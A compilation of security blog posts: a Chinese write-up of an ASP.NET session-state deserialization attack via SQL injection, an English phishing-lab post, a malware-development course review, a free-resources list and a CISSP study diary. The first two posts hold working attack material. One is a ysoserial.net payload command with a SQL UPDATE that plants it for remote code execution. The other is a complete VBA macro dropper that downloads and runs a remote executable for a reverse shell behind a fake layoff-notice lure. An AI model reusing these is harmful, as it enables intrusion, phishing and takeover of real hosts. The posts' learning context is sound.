                        } catch(Exception e) {
                            ThrowSqlConnectionException(cmd.Connection, e);
                        }
                    }
                }

                if (buf == null) {
                    /* Get short item */
                    buf = (byte[]) cmd.Parameters[1].Value;
                }

                using(stream = new MemoryStream(buf)) {
                    item = SessionStateUtility.DeserializeStoreData(context, stream, s_configCompressionEnabled);
                    _rqOrigStreamLen = (int) stream.Position;
                }
                return item;
            } finally {
                DisposeOrReuseConnection(ref conn, usePooling);
            }
        }
        
        class SqlStateConnection : IDisposable {
            internal SqlCommand TempGet {
                get {
                    if (_cmdTempGet == null) {
                        _cmdTempGet = new SqlCommand("dbo.TempGetStateItem3", _sqlConnection);
                        _cmdTempGet.CommandType = CommandType.StoredProcedure;
                        _cmdTempGet.CommandTimeout = s_commandTimeout;
                        // ignore process of setting parameters
                    }
                    return _cmdTempGet;
                }
            }
        }
    }
}

我們可以從程式碼清楚看出主要是呼叫 ASPState.dbo.TempGetStateItem3 Stored Procedure 取得 Session 的序列化二進制資料並保存到 buf 變數,最後將 buf 傳入 SessionStateUtility.DeserializeStoreData 進行反序列化還原出 Session 物件,而 TempGetStateItem3 這個 SP 則是相當於在執行 SELECT SessionItemShort FROM [ASPState].dbo.ASPStateTempSessions,所以可以知道 Session 是儲存在 ASPStateTempSessions 資料表的 SessionItemShort 欄位中。接著讓我們繼續往下看關鍵的 DeserializeStoreData 做了什麼樣的操作。同樣地,行數偏多,有需求的朋友請自行下拉 XD

namespace System.Web.SessionState {
    public static class SessionStateUtility {

        [SecurityPermission(SecurityAction.Assert, SerializationFormatter = true)]
        internal static SessionStateStoreData Deserialize(HttpContext context, Stream stream) {
            int                 timeout;
            SessionStateItemCollection   sessionItems;
            bool                hasItems;
            bool                hasStaticObjects;
            HttpStaticObjectsCollection staticObjects;
            Byte                eof;

            try {
                BinaryReader reader = new BinaryReader(stream);
                timeout = reader.ReadInt32();
                hasItems = reader.ReadBoolean();
                hasStaticObjects = reader.ReadBoolean();

                if (hasItems) {
                    sessionItems = SessionStateItemCollection.Deserialize(reader);
                } else {
                    sessionItems = new SessionStateItemCollection();
                }

                if (hasStaticObjects) {
                    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);
                } else {
                    staticObjects = SessionStateUtility.GetSessionStaticObjects(context);
                }

                eof = reader.ReadByte();
                if (eof != 0xff) {
                    throw new HttpException(SR.GetString(SR.Invalid_session_state));
                }
            } catch (EndOfStreamException) {
                throw new HttpException(SR.GetString(SR.Invalid_session_state));
            }
            return new SessionStateStoreData(sessionItems, staticObjects, timeout);
        }
    
        static internal SessionStateStoreData DeserializeStoreData(HttpContext context, Stream stream, bool compressionEnabled) {
            return SessionStateUtility.Deserialize(context, stream);
        }
    }
}

我們可以看到實際上 DeserializeStoreData 又是把反序列化過程轉交給其他類別,而依據取出的資料不同,可能會轉交給 SessionStateItemCollection.DeserializeHttpStaticObjectsCollection.Deserialize 做處理,在觀察程式碼後發現 HttpStaticObjectsCollection 的處理相對單純,所以我個人就選擇往這個分支下去研究。

namespace System.Web {
    public sealed class HttpStaticObjectsCollection : ICollection {
        static public HttpStaticObjectsCollection Deserialize(BinaryReader reader) {
            int     count;
            string  name;
            string  typename;
            bool    hasInstance;
            Object  instance;
            HttpStaticObjectsEntry  entry;
            HttpStaticObjectsCollection col;

            col = new HttpStaticObjectsCollection();

            count = reader.ReadInt32();
            while (count-- > 0) {
                name = reader.ReadString();
                hasInstance = reader.ReadBoolean();
                if (hasInstance) {
                    instance = AltSerialization.ReadValueFromStream(reader);
                    entry = new HttpStaticObjectsEntry(name, instance, 0);
                }
                else {
                    // skipped
                }
                col._objects.Add(name, entry);
            }

            return col;
        }
    }
}

跟進去一看,發現 HttpStaticObjectsCollection 取出一些 bytes 之後,又把過程轉交給 AltSerialization.ReadValueFromStream 進行處理,看到這的朋友們或許會臉上三條線地心想:「該不會又要追進去吧 . . 」,不過其實到此為止就已足夠,因為 AltSerialization 實際上類似於 BinaryFormatter 的包裝,到此已經有足夠資訊作利用,另外還有一個原因兼好消息,當初我程式碼追到此處時,上網一查這個物件,發現 ysoserial.net 已經有建立 AltSerialization 反序列化 payload 的 plugin,所以可以直接掏出這個利器來使用!下面一行指令就可以產生執行系統指令 calc.exe 的 base64 編碼後的 payload。

ysoserial.exe -p Altserialization -M HttpStaticObjectsCollection -o base64 -c "calc.exe"

不過到此還是有個小問題需要解決,ysoserial.net 的 AltSerialization plugin 所建立的 payload 是攻擊 SessionStateItemCollection 或 HttpStaticObjectsCollection 兩個類別的反序列化操作,而我們儲存在資料庫中的 session 序列化資料是由在此之上還額外作了一層包裝的 SessionStateUtility 類別處理的,所以必須要再做點修飾。回頭再去看看程式碼,會發現 SessionStateUtility 也只添加了幾個 bytes,減化後如下所示:

timeout = reader.ReadInt32();
hasItems = reader.ReadBoolean();
hasStaticObjects = reader.ReadBoolean();

if (hasStaticObjects)
    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);

eof = reader.ReadByte();

對於 Int32 要添加 4 個 bytes,Boolean 則是 1 個 byte,而因為要讓程式路徑能進入 HttpStaticObjectsCollection 的分支,必須讓第 6 個 byte 為 1 才能讓條件達成,先將原本從 ysoserial.net 產出的 payload 從 base64 轉成 hex 表示,再前後各別添加 6、1 bytes,如下示意圖:

  timeout    false  true            HttpStaticObjectsCollection             eof
┌─────────┐  ┌┐     ┌┐    ┌───────────────────────────────────────────────┐ ┌┐
00 00 00 00  00     01    010000000001140001000000fff ... 略 ... 0000000a0b ff

修飾完的這個 payload 就能用來攻擊 SessionStateUtility 類別了!

最後的步驟就是利用開頭的 SQL Injection 將惡意的序列化內容注入進去資料庫,如果正常瀏覽目標網站時有出現 ASP.NET_SessionId 的 Cookie 就代表已經有一筆對應的 Session 記錄儲存在資料庫裡,所以我們只需要執行如下的 SQL Update 語句:

?id=1; UPDATE ASPState.dbo.ASPStateTempSessions
       SET SessionItemShort = 0x{Hex_Encoded_Payload}
       WHERE SessionId LIKE '{ASP.NET_SessionId}%25'; --

分別將 {ASP.NET_SessionId} 替換成自己的 ASP.NET_SessionId 的 Cookie 值以及 {Hex_Encoded_Payload} 替換成前面準備好的序列化 payload 即可。

那假如沒有 ASP.NET_SessionId 怎麼辦?這表示目標可能還未儲存任何資料在 Session 之中,所以也就不會產生任何記錄在資料庫裡,但既然沒有的話,那我們就硬塞一個 Cookie 給它!ASP.NET 的 SessionId 是透過亂數產生的 24 個字元,但使用了客製化的字元集,可以直接使用以下的 Python script 產生一組 SessionId,例如:plxtfpabykouhu3grwv1j1qw,之後帶上 Cookie: ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw 瀏覽任一個 aspx 頁面,理論上 ASP.NET 就會自動在資料庫裡添加一筆記錄。

import random
chars = 'abcdefghijklmnopqrstuvwxyz012345'
print(''.join(random.choice(chars) for i in range(24)))

假如在資料庫裡仍然沒有任何記錄出現,那就只能手動刻 INSERT 的 SQL 來創造一個記錄,至於如何刻出這部分?只要看看程式碼應該就可以很容易構造出來,所以留給大家自行去玩 :P

等到 Payload 順利注入後,只要再次用這個 Cookie ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw 瀏覽任何一個 aspx 頁面,就會觸發反序列化執行任意系統指令!

題外話,利用 SessionState 的反序列化取得 ASP.NET 網站應用程式主機控制權的場景並不僅限於 SQL Injection。在內網滲透測試的過程中,經常會遇到的情境是,我們透過各方的資訊洩漏 ( 例如:內部 GitLab、任意讀檔等 ) 取得許多 SQL Server 的帳號、密碼,但唯獨取得不了目標 ASP.NET 網站應用程式的 Windows 主機的帳號密碼,而為了達成目標 ( 控制指定的網站主機 ),我們就曾經使用過這個方式取得目標的控制權,所以作為內網橫向移動的手段也是稍微有價值且非常有趣。至於還能有什麼樣的花樣與玩法,就要靠各位持續地發揮想像力!

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless. My ESXI lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLS and VLANs 🤣 Took me about a week to update (and save) switch configuration, cleanup my NAS, cleanup all my machines & VMs, destroy my ESXI lab and rebuild it. Just like before my ESXI lab simulates a corporate network, active directory environment with an assortment of machines running various services. I use PFSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses, CTFs, to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful we all have to spend the time to stand things up before we can even begin to start thinking about playing around.


Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was it was only 230 pages. I thought damn either this things is complete garbage and captures .01% of something irrelevant that some other guy loved or it’s chock full of gems. It was the latter! My heads spinning as we write our own VBA dropper, that writes a VBS file to the disk, that download the payload and execute reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – whom is probably already a little concerned over his job security. Since through
    reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
  3. You craft a fake Word document that seems to be a notice of this months layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document it’s a blurred image and enabling macros is going to begin and carry out the compromise. Is looks like this



    Payload:
    Sub AutoOpen()

    Dim PayloadFile As Integer

    Dim FilePath As String

    FilePath = "C:\tmp\payload.vbs"

    PayloadFile = FreeFile


    ' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.

    Open FilePath For Output As PayloadFile


    Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""

    Print #PayloadFile, ""

    Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"

    Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"

    Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"

    Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"

    Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"

    Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"

    Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"

    Print #PayloadFile, " strFile = myPath"

    Print #PayloadFile, " End If"

    Print #PayloadFile, ""

    Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"

    Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"

    Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"

    Print #PayloadFile, " objHTTP.Send"

    Print #PayloadFile, ""

    Print #PayloadFile, " res = objHTTP.ResponseBody"

    Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"

    Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"

    Print #PayloadFile, " objFile.Write currentChar"

    Print #PayloadFile, " Next"

    Print #PayloadFile, " objFile.Close( )"

    Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"

    Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""

    Print #PayloadFile, " End Sub"

    Close PayloadFile

    Shell "wscript c:\tmp\payload.vbs"

    End Sub


  4. The administrator viciously open the email, macro detonates, payload execute and you get your reverse shell.

Now that we got a way to execute payloads now on to converting the payload into a C2 host and setting the infrastructure! Here’s a videos of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

24 March 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

Introduction

I recently discovered the Sektor7 RED TEAM Operator: Malware Development Essentials course on 0x00sec and it instantly grabbed my interest. Lately I’ve been working on improving my programming skills, especially in C, on Windows, and in the context of red teaming. This course checked all those boxes, and was on sale for $95 to boot. So I broke out the credit card and purchased the course.

Custom code can be a huge benefit during pentesting and red team operations, and I’ve been trying to level up in that area. I’m a pentester by trade, with a little red teaming thrown in, so this course was right in my wheelhouse. My C is slightly rusty, not having done much with it since college, and almost exclusively on Linux rather than Windows. I wasn’t sure how prepared I would be for the course, but I was willing to try harder and do as much research as I needed to get through it.

Course Overview

The course description reads like this:

It will teach you how to develop your own custom malware for latest Microsoft Windows 10. And by custom malware we mean building a dropper for any payload you want (Metasploit meterpreter, Empire or Cobalt Strike beacons, etc.), injecting your shellcodes into remote processes, creating trojan horses (backdooring existing software) and bypassing Windows Defender AV.

It’s aimed at pentesters, red teamers, and blue teamers wanting to learn the details of offensive malware. It covers a range of topics aimed at developing and delivering a payload via a dropper file, using a variety of mechanisms to encrypt, encode, or obfuscate different elements of the executable. From the course page the topics include:

  • What is malware development
  • What is PE file structure
  • Where to store your payload inside PE
  • How to encode and encrypt payloads
  • How and why obfuscate function calls
  • How to backdoor programs
  • How to inject your code into remote processes

RTO: Malware Development Essentials covers the above with 9 different modules, starting with the basics of the PE file structure, ending with combining all the techniques taught to create a dropper executable that evades Windows Defender while injecting a shellcode payload into another process.

The course is delivered via a content platform called Podia, which allows streaming of the course videos and access to code samples and the included pre-configured Windows virtual machine for compiling and testing code. Podia worked quite well, and the provided code was clear, comprehensive, well-commented, and designed to be reusable later to create your own executables.

Module 1: Intro and Setup

The intro and setup module covers a quick into to the course and getting access to the excellent sample code and a virtual machine OVA image that contains a development environment, debugger, and tools like PEBear. I really like that the VM was provided, as it made jumping in and following along effortless, as well as saving time creating a development environment.

Module 2: Portable Executable

This module covers the Portable Executable (PE) format, how it is structured, and where things like code and data reside within it. It introduces PEBear, a tool for exploring PE files I’d not used before. It also covers the differences between executables and DLLs on Windows.

Module 3: Droppers

The dropper module covers how and where to store payload shellcode within a PE, using the .text, .data, and .rsrc sections. It also covers including external resources and compiling them into the final .exe.

Module 4: Obfuscation and Hiding

Obfuscation and hiding was one of my favorite modules. Anyone that has had their shellcode or implants caught will appreciate knowing how to use AES and XOR to encrypt payloads, and how to dynamically decrypt them at runtime to prevent static analysis. I also learned a lot about Windows and the Windows API through the sections on dynamically resolving functions and function call obfuscation.

Module 5: Backdoors and Trojans

This section covered code caves, hiding data within a PE, and how to backdoor an existing executable with a payload. x64dbg debugger is used extensively to examine a binary, find space for a payload, and ensure that the existing binary still functions normally. Already knowing assembly helped me here, but it’s explained well enough for those with little to no assembly knowledge to follow along.

Module 6: Code Injection

I learned a ton from this section, and it really clarified my knowledge of process injection, including within a process, between processes, and using a DLL. VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are more than just some function names involving process injection to me now.

Module 7: Extras

This module covered the differences between GUI and console programs on Windows, and how to ensure the dreaded black console window does not appear when your payload is executed.

Module 8: Combined Project

This was the culmination of the course, where you are walked through combining all the individual techniques and tools you learned throughout the course into a single executable. I suggest watching it and then doing it yourself independently to really internalize the material.

Module 9: Assignment

The last module is an assignment, which asks you to take what you’ve learned in the combined project and more fully implement some of the techniques, as well as providing some suggestions for real-world applications of the course content you can try by yourself.

Takeaways

I learned a heck of a lot from this course. It was not particularly long, but it covered the topics thoroughly and gave me a good base to build from. I can’t remember a course where I learned so much in so little time. Not only did I learn what was intended by the course, but there were a lot of ancillary things I picked up along the way that weren’t explicitly covered.

C on Windows

I found the course to be a good introduction to C on Windows, assuming you are already familiar with C. It’s not a beginning C programming course by any means. Most of my experience with C has been on Linux with gcc, and the course provided practical examples of how to write C on Windows, how to use MSDN effectively, how to structure programs, and how to interact with DLLs. I was familiar with many of the topics at a high level, but there’s no substitute for digging in and writing code.

Intro to the Windows API

I also learned a great deal on how the Windows API works and how to interact with it. The section on resolving functions manually was especially good. I have a much stronger grasp of how Windows presents different functionalities, and how to lookup functions and APIs on MSDN to incorporate them into my own code.

Making Windows Concepts Concrete

As mentioned above, there were a lot of areas I knew about at a high level, like process injection, DLLs, the Import Address Table, even some Windows APIs like WriteProcessMemory and CreateRemoteThread. But once I looked up their function signatures on MSDN, called them myself, created my own DLLs, and obfuscated the IAT, I had a much more concrete understanding of each topic, and I feel much more prepared to write my own tools in the future using what I’ve learned.

A Framework For Building Your Own Payloads

The way the course built from small functions and examples, all meant to be reused and built upon, really made the course worthwhile and feel like an investment I could take advantage of later in my own tools. I’ve already managed to craft a dropper that executes a staged Cobalt Strike payload that evades Windows Defender. How’s that for a practical hands-on course?

No Certification Exam

The course is not preparation for or in any way associated with a certification exam, which in this case I think is a good thing. The course presents fundamental knowledge that is immensely useful in offensive security, and I think it’s best learned for its own sake rather than to add more letters after your name. I like certifications in general and have several, but I found myself not worried about covering the material for an exam and enjoyed learning the material and thinking of practical applications of it at work and in CTFs, Hack The Box, etc. instead. It’s a nice feeling.

Conclusion

I loved this course, and reenz0h is a phenomenal instructor. If it’s not been obvious so far, I’ve gained a lot of fascinating and practical knowledge that will be useful far into the future. My recommendation: take this course if you can. It’s affordable, not an excessive time commitment, and worth every second and penny you spend on it. And just in case my enthusiasm comes across as excessive or shilling, I have no association with Sektor7, their employees, or the authors of the course. Just a happy pentester with some new skills.

Slayed CISSP

15 March 2020 at 23:03

I saw this day a countless amount of times in the last two months. Typing this blog post after passing the exam, is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the things fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good like the ones at the end of the post. Some are long and list out key things you should be on the lookout like CMMI or BCP without any other context. Continuing by saying how it was the MOST difficult test of their life, they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications not the actual cert. This one for instance, proves you are not only familiar with all the content from the 8 domains, but also, able to synthesis and apply it to scenario-based situations using sound risk management principals acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self Introspection (self observation) – is important as it’s a kind of regular check on self development which helps you to know what we have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives? Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

Major S/O to that sub it’s a trove of information! That’s part of why blog. As to keep this process continually flowing. Provide helpful materials to those after you.  We have to realize 90% of the time we’re acting as consumers not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports and basketball in particular – How many free throws might a average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actuality be well around 2 thousand or more. Now lets abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it all the practicing, reading all the materials from different sources, doing more practice questions, flashcards it’s all apart of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me I just feel like when I really want something there an insatiable thirst to quench and borderline obsession maybe for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, text everything. I cut everybody off and focused at the task at hand. It would need my upmost attention at all times. There’s absolutely no going out, minimal TV, if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dosing off. In bed i’m reading. When I wake up before I get out the bed I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describes someone in this stage is consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do you are laser-focused. As random as this is I see myself in my head as i’m typing this as heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” that’s the mode you need to be in – keeping in mind it’s a marathon not a sprint. Life will happen some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition  (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice test on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material, definitely vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work related experience. Gets two dings for being so damn big. Very useful but again it’s not something you can use alone to pass exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in easy digestible manner. She also gives you the 2nd half of what you need to pass, the mindset. Even with the recent price change I still think this worth however much it cost. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t alone pass exam with this.Scored low on my first Sybex Practice after her videos. I spot checked which domains I was coming up short in and went back to read it in the Sybex book again.
    Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions that have amazing well written thorough explanations. The secret sauce here is no matter if you get an answer incorrect or not you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios may one of the answer could possibly be right in another situation. That’s the beauty of Boson. This helps you identity where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is.The reason Boson gets 2 dings is that the beauty is in their explanations not necessarily the questions. Which in hindsight are way to technical. Which are reminiscent of all the study material test.
  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
    Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs so I knew it would push me here. We’re equally amazing but some unmatched wisdom in there for sure! This drastically improved the amount of information you retain as well as increase the depth of such information respectively. I think this is the case because you’re not just you in your head alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, this goes on 24/7 since the group is global. 4 pm EST or 4 am there’s going to be active discussions ALWAYS going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫 ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be apart of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I start to do a million practice questions from anything I could find books, practice sites, old materials. I guestimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2 day hiatus 🧾At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Green’s CISSP (9/10) course. Decided to change the pace a little bit. This was awesome very helpful with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course based on the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics. Like IOT SCADA Embedded Device. Recommended.
  • Mike Chapple LinkedIn Learning CISSP (9/10) course. Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal it in is incredible. You can remember PGP until the cows come home get hit with a question and totally only know that PGP stands for Pretty Good Privacy 😂 memorization won’t help you in the exam. He shows you in real-life implementations of the exam topics. Wonderful course.
  • After I finished all those I started from domain one and did the following for all 8 domains
    • Read Sybex chapter summary
    • Read 11th hr chapter summary
    • Watch Sari domain summary
    • Do Mike Chapple practice questions for associate domain
  • We’re at about 2 weeks out now time wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month ago 2 member of the squad from Discord discovered we all have the same exam date) The day before exam I get hit up to join a conference with both of them to do so last day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understandings and tying relate everything back to the RMF. It’s 10 pm night before exam and boy I’m thinking I probably shouldn’t have did all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a redbull 30 minutes earlier. Because I should be sleeping but a hr has gone by and I’m still wide awoke – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3:  You Didn’t All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. Now being so paranoid I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblat “CISSP Exam Tips” videos before leaving the car. Crazy only seeing about 4 people when on a regular day – a low amount normally would be around 50-100 and tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here’s my thoughts walking to from the garage to exam center – “You did not come this far to lose did you? You’ve been wrong countless amounts of time on Discord and understood why. You worked your buns off! You learned the material, the mindset, you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence, are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on it’s face. You already visioned this day many times before.  This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do you’re going to do amazing” This is how I’m I’m trying to make myself feel

In reality I’m scared as shit about this exam 😂 it’s not that I don’t the material – its I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down sorta grounded me. I had small talk with a guy as we’re walking to bathroom and we ask one another what we’re up against this morning. Turns out him along with 90% of the other people there (16 total) were taking their medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise cancelling headphones 🤞🏽

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign NDA. One of the things I wanted to write down was the forensic process. I started to list them out and got stuck after the “Collection” phase – It’s scares the living fucking daylight out of me. I said “F-This” and clicked “Start Exam” true story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice question which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principals – remembering your job is to reduce risk, provide information for senior management and apply the appropriate level of protection to your assets depends on their value and classification. Most of the questions are BEST, LEAST, WORST with all the possibly choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the power of 2’s after 20 seconds I said “F – This” and clicked “Next“. There were some gimmie’s sprinkled in there as well. Don’t forget “inch deep, mile wide” it’s way too much material for every single question to be a boulder. I made sure to slow down scrutinize every word in the questions, re-read all questions and answers and reading back the answer I chose. If a question was “Blah blah blah .. Which of following feature of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provide the solution to the problem” … Here’s what I saw most followed by question to illustrate the context for each one:

  • SDLC Related – What SDLC is Change Management most likely to be apart of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can i best protect this if that?
